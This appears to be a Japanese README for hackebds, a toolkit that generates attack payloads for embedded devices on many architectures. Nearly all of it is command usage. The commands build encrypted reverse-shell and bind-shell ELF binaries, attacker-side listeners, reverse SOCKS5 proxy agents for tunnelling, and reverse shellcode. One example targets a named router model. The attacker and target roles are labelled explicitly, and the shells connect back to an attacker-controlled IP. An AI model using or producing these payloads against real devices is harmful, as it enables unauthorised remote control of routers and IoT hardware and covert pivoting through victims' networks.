
このツールは、バックドアの暗号化、シェルコード・SOCKS5プロキシの生成、情報検索、およびさまざまなアーキテクチャデバイス向けのPOC整理に使用されます。
hackebds は、組み込みデバイス向けペイロード生成、暗号化シェルワークフロー、SOCKS5プロキシトンネリング、デバイス情報検索のためのツールキットです。
現在のブランチは、暗号化シェルとプロキシ機能に 純粋な ELF ワークフロー を採用しています。
reverse_shell_file + encrypted_shell_server / reverse_shell_serverbind_shell + bind_shell_clientreverse_proxy_file + reverse_proxy_serverforward_proxy_fileencrypted_shell_server / reverse_shell_server を追加し、Python ランタイムハンドラなしで暗号化リバースシェルを受信可能にbind_shell 用の ELF コネクタ bind_shell_client を追加aes と chacha20 を追加bind_shell、encrypted_shell_server、reverse_proxy_server、forward_proxy_file などのリスナー側 ELF バイナリに -bind_ip を追加reverse_shell_file と reverse_proxy_file は発信ペイロードのまま: を使用し、ローカルリスナー IP をバインドしないpython3 -m pip install -U hackebds
ローカル開発用インストール:
git clone https://github.com/doudoudedi/hackEmbedded
cd hackEmbedded
python3 -m pip install -e .
リリースホイールを別のホストで再ビルドする場合は、ソース zip と build_release.py を使用します。
unzip hackebds-0.4.3-source-for-x86-build.zip
cd hackebds-0.4.0.backup-20260411T142751Z
python3 -m pip install -U pip setuptools wheel cython
python3 build_release.py --plat manylinux2014_x86_64
ネイティブでない ELF ファイルを生成する前に、ターゲットアーキテクチャの binutils をインストールします。
sudo apt install binutils-aarch64-linux-gnu
sudo apt install binutils-arm-linux-gnueabi
sudo apt install binutils-mips-linux-gnu
sudo apt install binutils-mipsel-linux-gnu
sudo apt install binutils-mips64-linux-gnuabi64
sudo apt install binutils-mips64el-linux-gnuabi64
sudo apt install binutils-powerpc-linux-gnu
sudo apt install binutils-riscv64-linux-gnu
macOS ユーザーは pwntools binutils を使用できます:
brew install https://raw.githubusercontent.com/Gallopsled/pwntools-binutils/master/osx/binutils-$ARCH.rb
攻撃者側:
hackebds -arch x64 -res encrypted_shell_server \
-reverse_port 4444 \
-bind_ip 192.168.56.1 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename reverse_server.elf
chmod +x reverse_server.elf
./reverse_server.elf
ターゲット側:
hackebds -arch mipsel -res reverse_shell_file \
-reverse_ip 192.168.56.1 -reverse_port 4444 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename reverse_payload.elf
chmod +x reverse_payload.elf
./reverse_payload.elf
注意:
reverse_shell_file は -bind_ip をサポートしませんencrypted_shell_server は -bind_ip をサポートします-cipher chacha20 を -cipher aes に変更すると AES が使用されますターゲット側:
hackebds -arch aarch64 -res bind_shell \
-bind_port 5555 \
-bind_ip 192.168.56.20 \
-passwd "s3cr3t" \
-cipher chacha20 -encrypt_key "demo-key" \
-filename bind_shell.elf
chmod +x bind_shell.elf
./bind_shell.elf
攻撃者側:
hackebds -arch x64 -res bind_shell_client \
-reverse_ip 192.168.56.20 -reverse_port 5555 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename bind_client.elf
chmod +x bind_client.elf
./bind_client.elf
その後、次のように入力します:
s3cr3t
id
uname -a
exit
リスナー:
hackebds -arch x64 -res encrypted_shell_server --power \
-reverse_port 4444 \
-bind_ip 192.168.56.1 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename power_server.elf
./power_server.elf
ペイロード:
hackebds -arch armelv7 -res reverse_shell_file --power -sleep 10 \
-reverse_ip 192.168.56.1 -reverse_port 4444 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename power_payload.elf
サーバー:
hackebds -arch x64 -res reverse_proxy_server \
-agent_port 7000 -socks_port 1080 \
-bind_ip 192.168.56.1 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename reverse_proxy_server.elf
chmod +x reverse_proxy_server.elf
./reverse_proxy_server.elf
エージェント:
hackebds -arch mips64el -res reverse_proxy_file \
-reverse_ip 192.168.56.1 -reverse_port 7000 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename reverse_proxy_agent.elf
chmod +x reverse_proxy_agent.elf
./reverse_proxy_agent.elf
テスト:
curl --socks5-hostname 127.0.0.1:1080 http://example.com/
認証有効サーバー:
hackebds -arch x64 -res reverse_proxy_server \
-agent_port 7000 -socks_port 1080 \
-bind_ip 192.168.56.1 \
-socks_auth user:pass \
-cipher aes -encrypt_key "demo-key" \
-filename reverse_proxy_server_auth.elf
UDP に関する注意:
sparc / sparc64 は UDP サポート対象外と見なす必要がありますhackebds -arch x64 -res forward_proxy_file \
-listen_port 1081 \
-bind_ip 192.168.56.1 \
-filename forward_proxy.elf
chmod +x forward_proxy.elf
./forward_proxy.elf
テスト:
curl --socks5-hostname 127.0.0.1:1081 http://example.com/
hackebds -arch armelv7 -res reverse_shellcode \
-reverse_ip 192.168.56.1 -reverse_port 4444
-model の使用hackebds -reverse_ip 127.0.0.1 -reverse_port 9999 \
-model DIR-816 -res reverse_shell_file
--mcpu の使用hackebds -mcpu mips32r2 -li -arch mipsel \
-reverse_ip 127.0.0.1 -reverse_port 9999 \
-res reverse_shell_file
--firmware の使用hackebds --firmware ./firmware.bin
-bind_ip はリスナー側 ELF ファイルのみで使用しますreverse_shell_file と reverse_proxy_file は発信ペイロードであり、ローカルリスナー IP をバインドしませんreverse_proxy_server と forward_proxy_file は -bind_ip をサポートしますchacha20 と aes の両方で動作しますが、両側で一致させる必要があります-reverse_ip